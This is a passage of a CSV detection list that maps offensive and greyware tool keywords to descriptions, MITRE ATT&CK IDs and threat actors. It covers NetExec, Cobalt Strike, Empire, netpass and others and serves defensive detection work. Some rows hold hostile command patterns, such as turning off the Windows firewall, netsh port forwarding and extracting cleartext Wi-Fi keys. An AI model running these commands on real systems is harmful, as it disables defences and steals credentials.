security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*NetExec ldap * -M enum_trusts*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*NetExec winrm *--*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*NetExec-main.zip*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,1,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*Net-GPPPassword.cs*,offensive_tool_keyword,Net-GPPPassword,.NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.,T1059.001 - T1552.007,TA0002 - TA0006,N/A,N/A,Credential Access,https://github.com/outflanknl/Net-GPPPassword,1,1,N/A,10,2,156,37,2019-12-18T10:14:32Z,2019-10-14T12:35:46Z -*Net-GPPPassword.exe*,offensive_tool_keyword,Net-GPPPassword,.NET implementation of Get-GPPPassword. 
Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.,T1059.001 - T1552.007,TA0002 - TA0006,N/A,N/A,Credential Access,https://github.com/outflanknl/Net-GPPPassword,1,1,N/A,10,2,156,37,2019-12-18T10:14:32Z,2019-10-14T12:35:46Z -*Net-GPPPassword_dotNET*,offensive_tool_keyword,Net-GPPPassword,.NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.,T1059.001 - T1552.007,TA0002 - TA0006,N/A,N/A,Credential Access,https://github.com/outflanknl/Net-GPPPassword,1,1,N/A,10,2,156,37,2019-12-18T10:14:32Z,2019-10-14T12:35:46Z -*Net-GPPPassword-master*,offensive_tool_keyword,Net-GPPPassword,.NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.,T1059.001 - T1552.007,TA0002 - TA0006,N/A,N/A,Credential Access,https://github.com/outflanknl/Net-GPPPassword,1,1,N/A,10,2,156,37,2019-12-18T10:14:32Z,2019-10-14T12:35:46Z -*nethunter-*.torrent*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*nethunter-*.zip*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*nethunter-*-oos-ten-kalifs-full.zip*,offensive_tool_keyword,kali,Kali Linux is an open-source. 
Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*netlm_downgrade.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*NETLMv2_fmt_plug.*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*NetLoader.exe --path *.exe *,offensive_tool_keyword,NetLoader,Loads any C# binary in memory - patching AMSI + ETW,T1055.012 - T1112 - T1562.001,TA0005 - TA0002,N/A,N/A,Exploitation tools - Defense Evasion,https://github.com/Flangvik/NetLoader,1,0,N/A,10,7,684,139,2021-10-03T16:41:03Z,2020-05-05T15:20:16Z -*NetLoader-master*,offensive_tool_keyword,NetLoader,Loads any C# binary in memory 
- patching AMSI + ETW,T1055.012 - T1112 - T1562.001,TA0005 - TA0002,N/A,N/A,Exploitation tools - Defense Evasion,https://github.com/Flangvik/NetLoader,1,1,N/A,10,7,684,139,2021-10-03T16:41:03Z,2020-05-05T15:20:16Z -*netloggedonusers.*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*netlogon_##*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*netntlm.pl *,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*NetNTLMtoSilverTicket.git*,offensive_tool_keyword,NetNTLMtoSilverTicket,Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.,T1110.001 - T1558.003 - T1558.004,TA0006 - TA0008 - TA0002,N/A,N/A,Credential Access,https://github.com/NotMedic/NetNTLMtoSilverTicket,1,1,N/A,10,7,635,105,2021-07-26T15:16:20Z,2019-01-14T15:32:27Z -*NetNTLMtoSilverTicket-master*,offensive_tool_keyword,NetNTLMtoSilverTicket,Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.,T1110.001 - T1558.003 - T1558.004,TA0006 - TA0008 - TA0002,N/A,N/A,Credential Access,https://github.com/NotMedic/NetNTLMtoSilverTicket,1,1,N/A,10,7,635,105,2021-07-26T15:16:20Z,2019-01-14T15:32:27Z -*netpass.exe*,offensive_tool_keyword,netpass,When you connect to a network share on your LAN or to your .NET Passport account. Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the current logged-on user. It can also recover the passwords stored in Credentials file of external drive. 
as long as you know the last log-on password.,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/network_password_recovery.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*netpass.zip*,offensive_tool_keyword,netpass,When you connect to a network share on your LAN or to your .NET Passport account. Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the current logged-on user. It can also recover the passwords stored in Credentials file of external drive. as long as you know the last log-on password.,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/network_password_recovery.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*netpass_x64.exe*,offensive_tool_keyword,netpass,When you connect to a network share on your LAN or to your .NET Passport account. Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the current logged-on user. It can also recover the passwords stored in Credentials file of external drive. as long as you know the last log-on password.,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/network_password_recovery.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*netpass-x64.zip*,offensive_tool_keyword,netpass,When you connect to a network share on your LAN or to your .NET Passport account. Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the current logged-on user. 
It can also recover the passwords stored in Credentials file of external drive. as long as you know the last log-on password.,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/network_password_recovery.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*netscan.exe /*,greyware_tool_keyword,softperfect networkscanner,SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell,T1046 - T1065 - T1135 ,TA0007 ,N/A,N/A,Discovery,https://www.softperfect.com/products/networkscanner/,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*netscan_setup.exe*,greyware_tool_keyword,netscan,SoftPerfect Network Scanner abused by threat actor,T1040 - T1046 - T1018,TA0007 - TA0010 - TA0001,N/A,N/A,Network Exploitation tools,https://www.softperfect.com/products/networkscanner/,1,0,N/A,6,10,N/A,N/A,N/A,N/A -*NetSh Advfirewall set allprofiles state off*,greyware_tool_keyword,netsh,Disable Windows Firewall,T1562.004 - T1055.001,TA0005,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*netsh interface portproxy add v4tov4 listenport=* connectport=* connectaddress=*,greyware_tool_keyword,netsh,commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). 
This 2.0 version is obfuscated to avoid well known signatures from various AV engines.,T1047 - T1027 - T1059,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/ice-wzl/wmiexec2,1,1,N/A,9,1,10,1,2023-05-14T19:44:26Z,2023-02-07T22:10:08Z -*netsh interface portproxy add v4tov4*listenaddress=* listenport=*connectaddress=*connectport*,greyware_tool_keyword,netsh,The actor has used the following commands to enable port forwarding [T1090] on the host,T1090.003 - T1123,TA0005 - TA0002,N/A,Volt Typhoon,Credential Access,https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*netsh interface portproxy delete v4tov4 listenport=*,greyware_tool_keyword,netsh,commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.,T1047 - T1027 - T1059,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/ice-wzl/wmiexec2,1,1,N/A,9,1,10,1,2023-05-14T19:44:26Z,2023-02-07T22:10:08Z -*netsh interface portproxy show v4tov4*,greyware_tool_keyword,netsh,commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). 
This 2.0 version is obfuscated to avoid well known signatures from various AV engines.,T1047 - T1027 - T1059,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/ice-wzl/wmiexec2,1,1,N/A,9,1,10,1,2023-05-14T19:44:26Z,2023-02-07T22:10:08Z -*netsh wlan show profile $wlan key=clear | Select-String *?<=Key Content\s+:\s*,offensive_tool_keyword,WLAN-Windows-Passwords,Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.,T1056.005 - T1552.001 - T1119 - T1071.001,TA0004 - TA0006 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords,1,0,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*netsh.exe add helper *\temp\*.dll*,greyware_tool_keyword,NetshRun,Netsh.exe relies on extensions taken from Registry which means it may be used as a persistence and you go one step further extending netsh with a DLL allowing you to do whatever you want,T1546.008 - T1112 - T1037 - T1055 - T1218.001,TA0003 - TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/gtworek/PSBits/blob/master/NetShRun,1,0,N/A,N/A,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*netshrun.dll*,greyware_tool_keyword,NetshRun,Netsh.exe relies on extensions taken from Registry which means it may be used as a persistence and you go one step further extending netsh with a DLL allowing you to do whatever you want,T1546.008 - T1112 - T1037 - T1055 - T1218.001,TA0003 - TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/gtworek/PSBits/blob/master/NetShRun,1,1,N/A,N/A,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*netsniff-ng*,offensive_tool_keyword,netsniff-ng,netsniff-ng is a high performance Linux network sniffer for packet inspection. It can be used for protocol analysis. reverse engineering or network debugging. The gain of performance is reached by 'zero-copy' mechanisms. 
so that the kernel does not need to copy packets from kernelspace to userspace.,T1040 - T1043 - T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0007 - TA0011,N/A,N/A,Sniffing & Spoofing,https://packages.debian.org/fr/sid/netsniff-ng,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*netstat -ano*,greyware_tool_keyword,netstat,Adversaries may attempt to execute recon commands,T1046 - T1069,TA0002 - TA0003,N/A,N/A,Reconnaissance,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*netstat -ant*,greyware_tool_keyword,netstat,View all active TCP connections and the TCP and UDP ports the host is listening on.,T1046 - T1069,TA0002 - TA0003,N/A,N/A,Reconnaissance,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*netstat -tnlp || ss -tnlp*,offensive_tool_keyword,linux-smart-enumeration,Linux enumeration tool for privilege escalation and discovery,T1087.004 - T1016 - T1548.001 - T1046,TA0007 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/diego-treitos/linux-smart-enumeration,1,0,N/A,9,10,2924,535,2023-09-17T10:27:49Z,2019-02-13T11:02:21Z -*netstat -unlp || ss -unlp*,offensive_tool_keyword,linux-smart-enumeration,Linux enumeration tool for privilege escalation and discovery,T1087.004 - T1016 - T1548.001 - T1046,TA0007 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/diego-treitos/linux-smart-enumeration,1,0,N/A,9,10,2924,535,2023-09-17T10:27:49Z,2019-02-13T11:02:21Z -*NETSTAT.EXE* -ano*,greyware_tool_keyword,netstat,Adversaries may attempt to execute recon commands,T1046 - T1069,TA0002 - TA0003,N/A,N/A,Reconnaissance,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*nettitude/ETWHash*,offensive_tool_keyword,ETWHash,C# POC to extract NetNTLMv1/v2 hashes from ETW provider,T1556.001,TA0009 ,N/A,N/A,Credential 
Access,https://github.com/nettitude/ETWHash,1,1,N/A,N/A,3,229,27,2023-05-10T06:45:06Z,2023-04-26T15:53:01Z -*nettitude/MalSCCM*,offensive_tool_keyword,MalSCCM,This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage,T1072 - T1059.005 - T1090,TA0008 - TA0002 - TA0011,N/A,N/A,Exploitation tools,https://github.com/nettitude/MalSCCM,1,1,N/A,10,3,223,34,2023-09-28T17:29:50Z,2022-05-04T08:27:27Z -*netuser_enum*,offensive_tool_keyword,cobaltstrike,Situational Awareness commands implemented using Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Situational-Awareness-BOF,1,1,N/A,10,10,964,172,2023-09-22T15:51:55Z,2020-07-15T16:21:18Z -*netview.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Sniffing & Spoofing,https://github.com/SecureAuthCorp/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*netview_enum*,offensive_tool_keyword,cobaltstrike,Situational Awareness commands implemented using Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Situational-Awareness-BOF,1,1,N/A,10,10,964,172,2023-09-22T15:51:55Z,2020-07-15T16:21:18Z -*network2john.lua*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*NetworkMiner*,offensive_tool_keyword,NetworkMiner,A Network Forensic 
Analysis Tool (NFAT),T1040 - T1043 - T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0007 - TA0011,N/A,N/A,Sniffing & Spoofing,http://www.netresec.com/?page=NetworkMiner,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*new session to 127.0.0.1:3000*,offensive_tool_keyword,ptunnel-ng,Tunnel TCP connections through ICMP.,T1095.001 - T1043 - T1572.001,TA0011 - TA0040 - TA0003,N/A,N/A,Data Exfiltration,https://github.com/utoni/ptunnel-ng,1,0,N/A,N/A,3,285,60,2023-05-17T12:47:52Z,2017-12-19T18:10:35Z -*NewAdminAccountCreation.ps1*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,1,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*New-ElevatedPersistenceOption*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Persistence.psm1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*New-ElevatedPersistenceOption*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*New-HoneyHash*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,New-HoneyHash.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*New-HoneyHash.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1086,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*New-InMemoryModule -ModuleName Win32*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
